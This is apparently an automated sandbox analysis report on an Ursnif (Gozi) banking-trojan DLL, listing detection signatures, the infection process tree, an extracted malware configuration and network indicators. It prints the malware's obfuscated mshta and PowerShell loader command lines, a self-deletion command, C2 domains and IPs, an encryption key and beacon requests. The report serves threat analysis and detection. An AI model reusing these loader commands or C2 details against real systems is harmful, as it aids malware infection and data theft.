Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tIJVb0BvkI.dll

Overview

General Information

Sample Name:tIJVb0BvkI.dll
Analysis ID:620333
MD5:f28f39ada498d66c378fd59227e0f215
SHA1:1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
SHA256:0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6904 cmdline: loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6984 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7020 cmdline: rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4324 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5832 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 2464 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 6756 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
SourceRuleDescriptionAuthorStrings
00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries
            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.1060000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.4b694a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.500a4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.50894a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.4b694a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries
                      No Sigma rule has matched
                      Timestamp:05/04/22-16:27:52.293372 05/04/22-16:27:52.293372
                      SID:2033203
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:28:12.405919 05/04/22-16:28:12.405919
                      SID:2033203
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:28:12.829578 05/04/22-16:28:12.829578
                      SID:2033204
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Source: tIJVb0BvkI.dllReversingLabs: Detection: 47%
                      Source: tIJVb0BvkI.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_01065FBB
                      Source: tIJVb0BvkI.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49758 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 185.189.151.28:80
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/
                      Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2Fp
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz
                      Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBr
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642541789.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93d
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/ws
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642779966.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/5_2BPw3OSauP4MGGq6siPB/_2BnCqBYV_2Ft/k9TDCaV5/kdb0RbX2RH_2FsWBq58E
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01061CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_01061CA5
                      Source: global trafficHTTP traffic detected: GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
